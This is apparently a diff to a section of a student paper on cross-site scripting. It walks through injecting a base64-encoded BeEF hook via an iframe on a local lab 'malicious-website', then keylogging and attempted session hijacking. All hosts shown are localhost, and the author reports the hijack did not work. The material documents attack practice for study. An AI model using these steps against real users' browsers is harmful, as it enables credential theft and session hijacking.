centime/xss-paper/attacks.md

 IV.
 Steal a user's password, and beyond !
 Man In the Browser.
 -------------------------------------------------------------

+BeEF[6] : It means Browser Exploitation Framework, blablabla

+Add a beef hook to our page :

+    base64 -w0 add-hook.js > add-hook.b64

+    echo "<iframe src='http://localhost:8080/xss/$(cat payloads/add-hook.b64)'></iframe>" > malicious-website/add-hook.html
+    cd malicious-website && python3 -m http.server 1337

+Start beef server, and wait for a visitor.

+Key logger

+    Start the Man In the Browser attack to keep the target hooked when it follows links on the current domain.
+    [SREENSHOT]
+    All actions and inputs are recorded under the "logs" panel.
+    [SREENSHOT]

+Interactive session hijacking

+        Beef > target > use as proxy

+    [SREENSHOT]

+        chromium --temp-profile --proxy-server=localhost:6789

+    [SREENSHOT]

+    Unfortunately, I couldn't manage to get it to work.
+The requests stay blocked somewhere between BeEF and the zombie...

 V. Going further.
 -----------------
     xssless : worms !

+NBs
+---
+[A] But here I learnt that b64 is "a-zA-Z0-9=" AND... "/".
+    I can't figure out why, it seems so broken, but here it is : b64encode('t ?') == 'dCA/Cg==' So my url pattern may be broken by b64.
+Doesn't happen often though.

 Refs
 ----